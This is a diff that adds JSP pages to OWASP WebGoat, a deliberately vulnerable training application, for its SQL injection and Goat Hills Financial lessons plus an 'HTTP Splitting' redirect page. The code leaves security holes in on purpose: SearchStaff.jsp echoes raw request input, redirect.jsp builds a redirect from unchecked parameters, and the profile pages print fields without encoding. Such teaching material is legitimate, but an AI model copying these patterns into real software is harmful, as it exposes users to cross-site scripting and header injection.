+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<textarea name="<%=DBSQLInjection.DISCIPLINARY_NOTES%>"  cols="16" rows="3" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=DBSQLInjection.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=DBSQLInjection.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=DBSQLInjection.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=DBSQLInjection.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=DBSQLInjection.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>			
+			</div></form>
+		</div>	
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBSQLInjection/ListStaff.jsp b/main/project/WebContent/lessons/DBSQLInjection/ListStaff.jsp
new file mode 100755
index 000000000..035ab564c
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/ListStaff.jsp
@@ -0,0 +1,55 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=DBSQLInjection.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("DBSQLInjection." + DBSQLInjection.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=DBSQLInjection.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=DBSQLInjection.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, DBSQLInjection.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=DBSQLInjection.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, DBSQLInjection.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=DBSQLInjection.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=DBSQLInjection.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
diff --git a/main/project/WebContent/lessons/DBSQLInjection/Login.jsp b/main/project/WebContent/lessons/DBSQLInjection/Login.jsp
new file mode 100755
index 000000000..4807f7d9c
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=DBSQLInjection.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("DBSQLInjection." + DBSQLInjection.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=DBSQLInjection.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBSQLInjection/SearchStaff.jsp b/main/project/WebContent/lessons/DBSQLInjection/SearchStaff.jsp
new file mode 100755
index 000000000..0c42a5a32
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(DBSQLInjection.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=DBSQLInjection.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=DBSQLInjection.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBSQLInjection/ViewProfile.jsp b/main/project/WebContent/lessons/DBSQLInjection/ViewProfile.jsp
new file mode 100755
index 000000000..bd9151a63
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/ViewProfile.jsp
@@ -0,0 +1,154 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("DBSQLInjection." + DBSQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
+//	int myUserId = getIntSessionAttribute(webSession, "DBSQLInjection." + DBSQLInjection.USER_ID);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<%=employee.getFirstName()%>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<%=employee.getLastName()%>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<%=employee.getAddress1()%>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<%=employee.getAddress2()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<%=employee.getPhoneNumber()%>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<%=employee.getStartDate()%>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<%=employee.getSsn()%>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<%=employee.getSalary()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<%=employee.getCcn()%>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<%=employee.getCcnLimit()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<%=employee.getPersonalDescription()%>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<%=employee.getManager()%>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionNotes()%>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionDate()%>
+					</TD>
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.LISTSTAFF_ACTION))
+					 {
+					 %>                	
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBSQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBSQLInjection.LISTSTAFF_ACTION%>"/>
+						</form>
+					 <%
+					 }
+					 %>
+					 </td>
+		             <td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.EDITPROFILE_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBSQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBSQLInjection.EDITPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>					
+                    <td width="60">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBSQLInjection.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBSQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBSQLInjection.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=DBSQLInjection.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBSQLInjection/error.jsp b/main/project/WebContent/lessons/DBSQLInjection/error.jsp
new file mode 100755
index 000000000..5af0a45dc
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/error.jsp
@@ -0,0 +1,3 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	errorPage="" %>
+<br><br><br>An error has occurred.
diff --git a/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg
new file mode 100755
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_header.jpg b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_header.jpg
new file mode 100755
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg
new file mode 100755
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_menu.jpg b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_menu.jpg
new file mode 100755
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_workspace.jpg
new file mode 100755
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/DBSQLInjection/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/General/redirect.jsp b/main/project/WebContent/lessons/General/redirect.jsp
new file mode 100644
index 000000000..4160e56e5
--- /dev/null
+++ b/main/project/WebContent/lessons/General/redirect.jsp
@@ -0,0 +1,16 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>HTTP Splitting</title>
+</head>
+<body>
+<% response.sendRedirect("/WebGoat/attack?" +
+		        "Screen=" + request.getParameter("Screen") +
+		        "&menu=" + request.getParameter("menu") +
+		        "&fromRedirect=yes&language=" + request.getParameter("language")); 
+%>
+</body>
+</html>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/EditProfile.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/EditProfile.jsp
new file mode 100755
index 000000000..d486230e7
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/EditProfile.jsp
@@ -0,0 +1,137 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("GoatHillsFinancial.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Edit Profile Page</div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+<Table border="0" cellpadding="0" cellspacing="0">
+				<TR><TD width="110">
+						First Name:
+					</TD>
+					<TD width="193">
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+				  </TD>
+					<TD width="110">				
+						Last Name:					</TD>
+					<TD width="196">
+					 	<input class="lesson_text_db" name="<%=GoatHillsFinancial.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+				  </TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=GoatHillsFinancial.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD colspan="3">
+						<input name="<%=GoatHillsFinancial.DESCRIPTION%>" type="text" class="lesson_text_db" value="<%=employee.getPersonalDescription()%>" size="58"/>
+					</TD>
+				<TR>
+					<TD colspan="2">				
+						Disciplinary Explanation:  
+					</TD>
+					<TD>			
+						Disc. Date:
+					</TD>
+					<TD>			
+						<input class="lesson_text_db" name="<%=GoatHillsFinancial.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				<TR>
+					<TD colspan="4">
+						<textarea name="<%=GoatHillsFinancial.DISCIPLINARY_NOTES%>" cols="53" rows="2" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+				</TR>
+				<TR>	
+				<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=GoatHillsFinancial.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("GoatHillsFinancial.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=GoatHillsFinancial.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=GoatHillsFinancial.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=GoatHillsFinancial.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=GoatHillsFinancial.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>			
+			</div></form>
+		</div>
+		
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.css b/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.css
new file mode 100755
index 000000000..61e93f63c
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/GoatHillsFinancial/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/GoatHillsFinancial/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/GoatHillsFinancial/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/GoatHillsFinancial/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
new file mode 100755
index 000000000..90dbef989
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/GoatHillsFinancial.jsp
@@ -0,0 +1,30 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*" 
+	errorPage="" %>
+<%@page import="org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;"%>
+<style>
+<jsp:include page="GoatHillsFinancial.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+System.out.println("WebSession is " + webSession);
+GoatHillsFinancial currentLesson = (GoatHillsFinancial) webSession.getCurrentLesson();
+System.out.println("CurrentLesson = " + currentLesson);
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	System.out.println("SubViewPage is " + subViewPage);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/ListStaff.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/ListStaff.jsp
new file mode 100755
index 000000000..f3bbd0055
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/ListStaff.jsp
@@ -0,0 +1,55 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=GoatHillsFinancial.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=GoatHillsFinancial.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=GoatHillsFinancial.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, GoatHillsFinancial.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=GoatHillsFinancial.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, GoatHillsFinancial.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=GoatHillsFinancial.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=GoatHillsFinancial.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/Login.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/Login.jsp
new file mode 100755
index 000000000..9e13040cd
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=GoatHillsFinancial.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=GoatHillsFinancial.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/SearchStaff.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/SearchStaff.jsp
new file mode 100755
index 000000000..611a826fd
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(GoatHillsFinancial.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+				<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=GoatHillsFinancial.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=GoatHillsFinancial.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/GoatHillsFinancial/ViewProfile.jsp b/main/project/WebContent/lessons/GoatHillsFinancial/ViewProfile.jsp
new file mode 100755
index 000000000..a03d60a07
--- /dev/null
+++ b/main/project/WebContent/lessons/GoatHillsFinancial/ViewProfile.jsp
@@ -0,0 +1,157 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial" 
+	errorPage="" %>
+<%
+	Employee employee = (Employee) session.getAttribute("GoatHillsFinancial." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY);
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+//	int myUserId = getIntSessionAttribute(webSession, "GoatHillsFinancial." + GoatHillsFinancial.USER_ID);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - View Profile Page</div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getFirstName()%></span>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<span class="lesson_text_db"><%=employee.getLastName()%></span>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getAddress1()%></span>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<span class="lesson_text_db"><%=employee.getAddress2()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getPhoneNumber()%></span>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getStartDate()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<span class="lesson_text_db"><%=employee.getSsn()%></span>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getSalary()%></span>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<span class="lesson_text_db"><%=employee.getCcn()%></span>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
